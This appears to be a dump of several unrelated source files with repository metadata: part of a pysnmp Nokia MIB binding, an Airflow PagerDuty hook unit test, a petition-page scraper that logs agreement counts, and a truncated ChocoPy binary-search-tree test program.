if mibBuilder.loadTexts: noiPmFileTransferProtocol.setDescription('Contains the supported file transfer mechanism for various files within NE3S. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiPmResultTransfer = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 3), NoiMeasurementResultTransfer()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmResultTransfer.setStatus('current')
if mibBuilder.loadTexts: noiPmResultTransfer.setDescription('Contains the supported transfer mechanism for measurement result, e.g. notification based or polling based. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementScheduleFileDirectory = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 4), NoiMeasurementFileDirectory()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementScheduleFileDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementScheduleFileDirectory.setDescription('Contains the directory where the measurement schedule file is stored within the agent. The manager polls the value before downloading the measurement file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementRepositoryDirectory = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 5), NoiMeasurementFileDirectory()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementRepositoryDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementRepositoryDirectory.setDescription('Contains the directory where the measurement repository file is stored within the agent. The manager polls the value before retrieving the repository file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementRepositoryFile = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 6), NoiMeasurementFileName()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementRepositoryFile.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementRepositoryFile.setDescription('Contains the file name of the repository file. The manager polls the value before retrieving the repository file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementJobStatus = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 7), NoiMeasurementJobStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementJobStatus.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementJobStatus.setDescription('This object represent the measurement job status. The agent will update the value according to the state model defined in the interface specification.')
noiMeasurementActivationError = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 8), NoiMeasurementActivationError()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementActivationError.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementActivationError.setDescription('Contains the error code in case of failure in measurement administration.')
noiPmAdditionalText = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 9), NoiAdditionalText()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmAdditionalText.setStatus('current')
if mibBuilder.loadTexts: noiPmAdditionalText.setDescription('Contains additional text and is used in conjunction with the notification noiMeasurementResultTableRebuild and in case of failure in measurement administration.')
noiPmFileStoringPeriod = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 10), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmFileStoringPeriod.setStatus('current')
if mibBuilder.loadTexts: noiPmFileStoringPeriod.setDescription(' Contains the storage duraion for the measurement file in the agent. Duration in minutes. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementResultTableCount = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 1), NoiAlarmTableCount()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultTableCount.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableCount.setDescription('Contains the number or current active entries in the measurement table. When the table is empty, the value of this object is zero (0).')
noiMeasurementResultTableMaxCount = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 2), NoiAlarmTableCount()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultTableMaxCount.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableMaxCount.setDescription('Contains the maximum number of entries in the in the measurement table.')
noiPmLastMeasurementResultId = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 3), NoiMeasurementResultIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmLastMeasurementResultId.setStatus('current')
if mibBuilder.loadTexts: noiPmLastMeasurementResultId.setDescription('This object represent the measurement identifier of last send notification noiMeasurementResultReady The manager can retrieve the current value of this object to detect lost notifications. This mechanism can be used by the manager when no notification is received for a certain time (e.g. 30 minutes) to evaluate whether an retrieval of of entries from the measurement table shall be performed')
noiMeasurementResultTable = MibTable((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4), )
if mibBuilder.loadTexts: noiMeasurementResultTable.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTable.setDescription('Table containing information about the measurement files that are currently stored in the Network Element and accessible for the manager. Agent will create a new entry, whenever a new measurement file has been created. When removing a measurement file, the corresponding entry in the table must be removed.')
noiMeasurementResultEntry = MibTableRow((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1), ).setIndexNames((0, "NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"))
if mibBuilder.loadTexts: noiMeasurementResultEntry.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultEntry.setDescription('One entry in the measurement table, containing the information of one measurement file.')
noiMeasurementResultIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 1), NoiMeasurementResultIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultIdentifier.setStatus('current')
# Auto-generated pysnmp bindings for the NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP
# (performance-management) MIB.  The `if mibBuilder.loadTexts:` guards attach the
# human-readable status/description strings only when the loader was asked to
# keep MIB texts (they are skipped otherwise to save memory).
if mibBuilder.loadTexts: noiMeasurementResultIdentifier.setDescription('This object represents the measurement identifier of an entry in the measurement table. It uniquely identifies an entry in the table.')
# Remaining columns of the measurement-result table: file name, directory, event time.
noiMeasurementFileName = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 2), NoiMeasurementFileName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementFileName.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementFileName.setDescription('This object represents the file name of a measurement result file.')
noiMeasurementFileDirectory = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 3), NoiMeasurementFileDirectory()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementFileDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementFileDirectory.setDescription('This object represents the full path of a measurement resulta file.')
noiPmEventTime = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 4), NoiEventTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmEventTime.setStatus('current')
if mibBuilder.loadTexts: noiPmEventTime.setDescription('This object represents the time the event occured.')
# Notifications emitted by the PM agent: a new result file is available, or the
# whole measurement table was rebuilt (all previous entries dropped).
noiMeasurementResultReady = NotificationType((1, 3, 6, 1, 4, 1, 94, 7, 3, 3, 0, 1)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileName"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"))
if mibBuilder.loadTexts: noiMeasurementResultReady.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultReady.setDescription('This notification is used when a new measurement data file has been created and a new entry in the measurement table has been inserted.')
noiMeasurementResultTableRebuild = NotificationType((1, 3, 6, 1, 4, 1, 94, 7, 3, 3, 0, 2)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmAdditionalText"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"))
if mibBuilder.loadTexts: noiMeasurementResultTableRebuild.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableRebuild.setDescription('This notification is used when the measurement table in the agent has been rebuild. The notification will be emitted after the measurement table has been dropped and all previously stored entries have been removed')
# Conformance section: compliance statement plus the mandatory-object and
# optional-notification groups it references.
noiPmIRPCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 1)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmMandatoryGroup"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmNotificationOptionalGroup"))
# NOTE(review): setStatus() is only chained on mibBuilder versions > 4.4.0 —
# presumably older pysnmp releases do not return the object there; confirm.
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    noiPmIRPCompliance = noiPmIRPCompliance.setStatus('current')
if mibBuilder.loadTexts: noiPmIRPCompliance.setDescription('This specifies the objects that are required to claim compliance to NE3S PM Fragment.')
noiPmMandatoryGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 2)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmIrpVersion"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmLastMeasurementResultId"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementScheduleFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableCount"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableMaxCount"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileName"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmFileStoringPeriod"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    noiPmMandatoryGroup = noiPmMandatoryGroup.setStatus('current')
if mibBuilder.loadTexts: noiPmMandatoryGroup.setDescription('A collection of objects that represents mandatory PM attributes.')
noiPmNotificationOptionalGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 3)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultReady"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableRebuild"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    noiPmNotificationOptionalGroup = noiPmNotificationOptionalGroup.setStatus('current')
if mibBuilder.loadTexts: noiPmNotificationOptionalGroup.setDescription('A collection of optional measurement notifications.')
# Export every defined symbol so other MIB modules can resolve them by name.
mibBuilder.exportSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", noiPmMandatoryGroup=noiPmMandatoryGroup, noiMeasurementResultIdentifier=noiMeasurementResultIdentifier, noiSnmpPmIrp=noiSnmpPmIrp, noiMeasurementFileDirectory=noiMeasurementFileDirectory, noiMeasurementResultTableCount=noiMeasurementResultTableCount, noiPmIrpVersion=noiPmIrpVersion, noiPmNotificationOptionalGroup=noiPmNotificationOptionalGroup, noiMeasurementJobStatus=noiMeasurementJobStatus, noiMeasurementFileName=noiMeasurementFileName, noiMeasurementResultTableRebuild=noiMeasurementResultTableRebuild, noiPmEventTime=noiPmEventTime, noiPmLastMeasurementResultId=noiPmLastMeasurementResultId, noiMeasurementResultEntry=noiMeasurementResultEntry, noiPmResultTransfer=noiPmResultTransfer, noiPmFileStoringPeriod=noiPmFileStoringPeriod, noiMeasurementActivationError=noiMeasurementActivationError, noiPmAdditionalText=noiPmAdditionalText, noiMeasurementResultTable=noiMeasurementResultTable, noiMeasurementScheduleFileDirectory=noiMeasurementScheduleFileDirectory, noiMeasurementRepositoryDirectory=noiMeasurementRepositoryDirectory, noiMeasurementResultReady=noiMeasurementResultReady, noiMeasurementRepositoryFile=noiMeasurementRepositoryFile, noiMeasurementResultTableMaxCount=noiMeasurementResultTableMaxCount, noiPmIRPCompliance=noiPmIRPCompliance, noiPmFileTransferProtocol=noiPmFileTransferProtocol, PYSNMP_MODULE_ID=noiSnmpPmIrp)
| [
"[email protected]"
] | |
767c2bfac9638826491205fbf82df7b3dfcd3672 | 6169a0af24553278c9493c9ac14d2351e9085afd | /tests/providers/pagerduty/hooks/test_pagerduty_events.py | 3c68ba8247954e373fa2502a56287ba653a750a3 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | Nextdoor/airflow | c994f8fbaf48bebd891300f44dd78a58fd0b057b | 863ec46e25ea49d6d5b006d8fd3a83f50aa9db79 | refs/heads/master | 2023-06-12T19:25:58.052324 | 2023-01-20T17:43:14 | 2023-01-20T17:43:14 | 54,076,271 | 7 | 8 | Apache-2.0 | 2023-06-05T20:38:53 | 2016-03-17T00:34:45 | Python | UTF-8 | Python | false | false | 2,285 | py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import pytest
from airflow.models import Connection
from airflow.providers.pagerduty.hooks.pagerduty import PagerdutyEventsHook
from airflow.utils import db
# Connection id shared by every test in this module.
DEFAULT_CONN_ID = "pagerduty_events_default"
# Class-scoped fixture: seeds (or updates) the default PagerDuty Events
# connection in the Airflow metadata DB once per test class.
@pytest.fixture(scope="class")
def events_connections():
    """Create the default Events API connection with password "events_token"."""
    db.merge_conn(Connection(conn_id=DEFAULT_CONN_ID, conn_type="pagerduty_events", password="events_token"))
class TestPagerdutyEventsHook:
    """Unit tests for PagerdutyEventsHook against the PagerDuty Events v2 API."""
    def test_get_integration_key_from_password(self, events_connections):
        """The hook reads its integration key from the connection password."""
        hook = PagerdutyEventsHook(pagerduty_events_conn_id=DEFAULT_CONN_ID)
        assert hook.integration_key == "events_token", "token initialised."
    def test_token_parameter_override(self, events_connections):
        """An explicit integration_key argument overrides the connection password."""
        hook = PagerdutyEventsHook(integration_key="override_key", pagerduty_events_conn_id=DEFAULT_CONN_ID)
        assert hook.integration_key == "override_key", "token initialised."
    def test_create_event(self, requests_mock, events_connections):
        """create_event posts to the v2 enqueue endpoint and returns the JSON body."""
        hook = PagerdutyEventsHook(pagerduty_events_conn_id=DEFAULT_CONN_ID)
        mock_response_body = {
            "status": "success",
            "message": "Event processed",
            "dedup_key": "samplekeyhere",
        }
        # requests_mock (pytest plugin fixture) intercepts the outgoing HTTP POST.
        requests_mock.post("https://events.pagerduty.com/v2/enqueue", json=mock_response_body)
        resp = hook.create_event(
            summary="test",
            source="airflow_test",
            severity="error",
        )
        assert resp == mock_response_body
| [
"[email protected]"
] | |
2e8d96e368d310b51d62e922dc251c8951687ea3 | 8a00b3895a626cf539a526b62c517deea06971d4 | /stage.py | 9d9b0332b17a9699b9cb20e7429128322ce4261e | [
"MIT"
] | permissive | SJang1/korea-president-petition-crawler | f77083cdfaa7efc38b4e39966259c47f310613d9 | a377b098562a2c22748c437fd320cc8f7aabcdcb | refs/heads/master | 2020-04-22T13:23:50.183111 | 2019-02-13T00:45:48 | 2019-02-13T00:45:48 | 170,407,752 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | import requests
from bs4 import BeautifulSoup
import time
import os
# Petition ids to poll on the Blue House (president.go.kr) petition site.
codes = ["522031"]
def crawl(code):
    """Fetch the petition page for *code* and return the raw response body.

    A timeout is set so a stalled connection cannot hang the polling loop
    forever -- requests waits indefinitely when no timeout is given.
    """
    url = "https://www1.president.go.kr/petitions/{}".format(code)
    data = requests.get(url, timeout=30)
    return data.content
def user(string):
    """Parse petition page HTML; return {"time", "title", "agrees"} as strings."""
    httprequest = BeautifulSoup(string, "html.parser")
    # The agreement counter lives inside the "petitionsView_count" header.
    # NOTE(review): each find() returns None if the site markup changes, which
    # would raise AttributeError below -- confirm the selectors still match.
    wrapuser = httprequest.find("h2", {"class":"petitionsView_count"})
    users = wrapuser.find("span", {"class":"counter"})
    title = httprequest.find("h3", {"class":"petitionsView_title"})
    # Local wall-clock time of this poll, e.g. "Wed Feb 13 09:45:00 2019".
    timestamp = time.ctime()
    return {"time":timestamp,"title":title.text, "agrees":users.text}
def main():
    """Poll each petition forever, appending one snapshot per cycle to output.txt.

    Bug fix: the original re-invoked main() recursively from inside the loop,
    growing the call stack without bound (eventually RecursionError).  An
    explicit infinite loop has the same observable polling behaviour without
    the stack growth, and actually visits every id in `codes` each cycle.
    """
    while True:
        for code in codes:
            predata = user(crawl(code))
            # Append mode so history accumulates across polling cycles; the
            # context manager guarantees the handle is closed even on error.
            with open("output.txt", "a") as f:
                f.write(os.linesep + str(predata))
            # Be polite to the server: one snapshot every 150 seconds.
            time.sleep(150)
main()
| [
"[email protected]"
] | |
08631b60708e517e228451d1629faaf2e74402f4 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-6757.py | b4b3b9f3005553b5202d6d4dff1c2e95e4d0376b | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,289 | py | # Binary-search trees
class TreeNode(object):
    value:int = 0
    left:"TreeNode" = None
    right:"TreeNode" = None
    def insert(self:"TreeNode", x:int) -> bool:
        # Insert x below this node; duplicates are rejected (returns False).
        if x == self.value:
            return False
        if x < self.value:
            if self.left is None:
                self.left = makeNode(x)
                return True
            return self.left.insert(x)
        if self.right is None:
            self.right = makeNode(x)
            return True
        return self.right.insert(x)
    def contains(self:"TreeNode", x:int) -> bool:
        # Iterative descent instead of recursion: walk left/right until the
        # key is found or a missing child proves absence.
        node:"TreeNode" = None
        node = self
        while not (node is None):
            if x < node.value:
                node = node.left
            elif x > node.value:
                node = node.right
            else:
                return True
        return False
class TreeNode2(object):
    value:int = 0
    value2:int = 0
    left:"TreeNode2" = None
    left2:"TreeNode2" = None
    right:"TreeNode2" = None
    right2:"TreeNode2" = None
    def insert(self:"TreeNode2", x:int) -> bool:
        # Insert x below this node; new leaves copy x into both value slots.
        if x == self.value:
            return False
        if x < self.value:
            if self.left is None:
                self.left = makeNode2(x, x)
                return True
            return self.left.insert(x)
        if self.right is None:
            self.right = makeNode2(x, x)
            return True
        return self.right.insert(x)
    def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
        # x2 is ignored; the original duplicated insert's body verbatim.
        return self.insert(x)
    def contains(self:"TreeNode2", x:int) -> bool:
        # Iterative membership test over the primary value/left/right fields.
        node:"TreeNode2" = None
        node = self
        while not (node is None):
            if x < node.value:
                node = node.left
            elif x > node.value:
                node = node.right
            else:
                return True
        return False
    def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
        # x2 is ignored; mirrors contains().
        return self.contains(x)
class TreeNode3(object):
    value:int = 0
    value2:int = 0
    value3:int = 0
    left:"TreeNode3" = None
    left2:"TreeNode3" = None
    left3:"TreeNode3" = None
    right:"TreeNode3" = None
    right2:"TreeNode3" = None
    right3:"TreeNode3" = None
    def insert(self:"TreeNode3", x:int) -> bool:
        # Insert x below this node; new leaves copy x into every value slot.
        if x == self.value:
            return False
        if x < self.value:
            if self.left is None:
                self.left = makeNode3(x, x, x)
                return True
            return self.left.insert(x)
        if self.right is None:
            self.right = makeNode3(x, x, x)
            return True
        return self.right.insert(x)
    def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
        # Extra arguments are ignored; the original duplicated insert verbatim.
        return self.insert(x)
    def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
        return self.insert(x)
    def contains(self:"TreeNode3", x:int) -> bool:
        # Iterative membership test over the primary value/left/right fields.
        node:"TreeNode3" = None
        node = self
        while not (node is None):
            if x < node.value:
                node = node.left
            elif x > node.value:
                node = node.right
            else:
                return True
        return False
    def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
        # Extra arguments are ignored; mirrors contains().
        return self.contains(x)
    def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
        return self.contains(x)
class TreeNode4(object):
    value:int = 0
    value2:int = 0
    value3:int = 0
    value4:int = 0
    left:"TreeNode4" = None
    left2:"TreeNode4" = None
    left3:"TreeNode4" = None
    left4:"TreeNode4" = None
    right:"TreeNode4" = None
    right2:"TreeNode4" = None
    right3:"TreeNode4" = None
    right4:"TreeNode4" = None
    def insert(self:"TreeNode4", x:int) -> bool:
        # Insert x below this node; new leaves copy x into every value slot.
        if x == self.value:
            return False
        if x < self.value:
            if self.left is None:
                self.left = makeNode4(x, x, x, x)
                return True
            return self.left.insert(x)
        if self.right is None:
            self.right = makeNode4(x, x, x, x)
            return True
        return self.right.insert(x)
    def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
        # Extra arguments are ignored; the original duplicated insert verbatim.
        return self.insert(x)
    def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
        return self.insert(x)
    def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
        return self.insert(x)
    def contains(self:"TreeNode4", x:int) -> bool:
        # Iterative membership test over the primary value/left/right fields.
        node:"TreeNode4" = None
        node = self
        while not (node is None):
            if x < node.value:
                node = node.left
            elif x > node.value:
                node = node.right
            else:
                return True
        return False
    def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
        # Extra arguments are ignored; mirrors contains().
        return self.contains(x)
    def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
        return self.contains(x)
    def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
        return self.contains(x)
class TreeNode5(object):
    value:int = 0
    value2:int = 0
    value3:int = 0
    value4:int = 0
    value5:int = 0
    left:"TreeNode5" = None
    left2:"TreeNode5" = None
    left3:"TreeNode5" = None
    left4:"TreeNode5" = None
    left5:"TreeNode5" = None
    right:"TreeNode5" = None
    right2:"TreeNode5" = None
    right3:"TreeNode5" = None
    right4:"TreeNode5" = None
    right5:"TreeNode5" = None
    def insert(self:"TreeNode5", x:int) -> bool:
        # Insert x below this node; new leaves copy x into every value slot.
        if x == self.value:
            return False
        if x < self.value:
            if self.left is None:
                self.left = makeNode5(x, x, x, x, x)
                return True
            return self.left.insert(x)
        if self.right is None:
            self.right = makeNode5(x, x, x, x, x)
            return True
        return self.right.insert(x)
    def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
        # Extra arguments are ignored; the original duplicated insert verbatim.
        return self.insert(x)
    def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
        return self.insert(x)
    def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
        return self.insert(x)
    def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        return self.insert(x)
    def contains(self:"TreeNode5", x:int) -> bool:
        # Iterative membership test over the primary value/left/right fields.
        node:"TreeNode5" = None
        node = self
        while not (node is None):
            if x < node.value:
                node = node.left
            elif x > node.value:
                node = node.right
            else:
                return True
        return False
    def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
        # Extra arguments are ignored; mirrors contains().
        return self.contains(x)
    def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
        return self.contains(x)
    def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
        return self.contains(x)
    def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        return self.contains(x)
class Tree(object):
    root:TreeNode = None
    size:int = 0
    def insert(self:"Tree", x:int) -> object:
        # First insert creates the root; afterwards size counts distinct keys.
        if self.root is None:
            self.root = makeNode(x)
            self.size = 1
            return
        if self.root.insert(x):
            self.size = self.size + 1
    def contains(self:"Tree", x:int) -> bool:
        # An empty tree contains nothing; otherwise delegate to the root node.
        if self.root is None:
            return False
        return self.root.contains(x)
class Tree2(object):
    root:TreeNode2 = None
    root2:TreeNode2 = None
    size:int = 0
    size2:int = 0
    def insert(self:"Tree2", x:int) -> object:
        # First insert creates the root; afterwards size counts distinct keys.
        if self.root is None:
            self.root = makeNode2(x, x)
            self.size = 1
            return
        if self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree2", x:int, x2:int) -> object:
        # x2 is unused; identical to insert() in the generated original.
        self.insert(x)
    def contains(self:"Tree2", x:int) -> bool:
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains2(self:"Tree2", x:int, x2:int) -> bool:
        # x2 is unused; identical to contains().
        return self.contains(x)
class Tree3(object):
    root:TreeNode3 = None
    root2:TreeNode3 = None
    root3:TreeNode3 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    def insert(self:"Tree3", x:int) -> object:
        # First insert creates the root; afterwards size counts distinct keys.
        if self.root is None:
            self.root = makeNode3(x, x, x)
            self.size = 1
            return
        if self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree3", x:int, x2:int) -> object:
        # Extra arguments are unused; identical to insert().
        self.insert(x)
    def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
        self.insert(x)
    def contains(self:"Tree3", x:int) -> bool:
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains2(self:"Tree3", x:int, x2:int) -> bool:
        # Extra arguments are unused; identical to contains().
        return self.contains(x)
    def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
        return self.contains(x)
class Tree4(object):
    root:TreeNode4 = None
    root2:TreeNode4 = None
    root3:TreeNode4 = None
    root4:TreeNode4 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    size4:int = 0
    def insert(self:"Tree4", x:int) -> object:
        # First insert creates the root; afterwards size counts distinct keys.
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
            return
        if self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree4", x:int, x2:int) -> object:
        # Extra arguments are unused; identical to insert().
        self.insert(x)
    def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
        self.insert(x)
    def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
        self.insert(x)
    def contains(self:"Tree4", x:int) -> bool:
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains2(self:"Tree4", x:int, x2:int) -> bool:
        # Extra arguments are unused; identical to contains().
        return self.contains(x)
    def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
        return self.contains(x)
    def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
        return self.contains(x)
class Tree5(object):
    root:TreeNode5 = None
    root2:TreeNode5 = None
    root3:TreeNode5 = None
    root4:TreeNode5 = None
    root5:TreeNode5 = None
    # Bug fix: `size` was annotated `$ID` -- an unsubstituted generator
    # placeholder and a syntax error; restored to `int` to match Tree..Tree4.
    size:int = 0
    size2:int = 0
    size3:int = 0
    size4:int = 0
    size5:int = 0
    def insert(self:"Tree5", x:int) -> object:
        # First insert creates the root; afterwards size counts distinct keys.
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert2(self:"Tree5", x:int, x2:int) -> object:
        # Extra arguments are unused; the original duplicated insert verbatim.
        self.insert(x)
    def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
        self.insert(x)
    def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
        self.insert(x)
    def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
        self.insert(x)
    def contains(self:"Tree5", x:int) -> bool:
        # An empty tree contains nothing; otherwise delegate to the root node.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains2(self:"Tree5", x:int, x2:int) -> bool:
        # Extra arguments are unused; identical to contains().
        return self.contains(x)
    def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
        return self.contains(x)
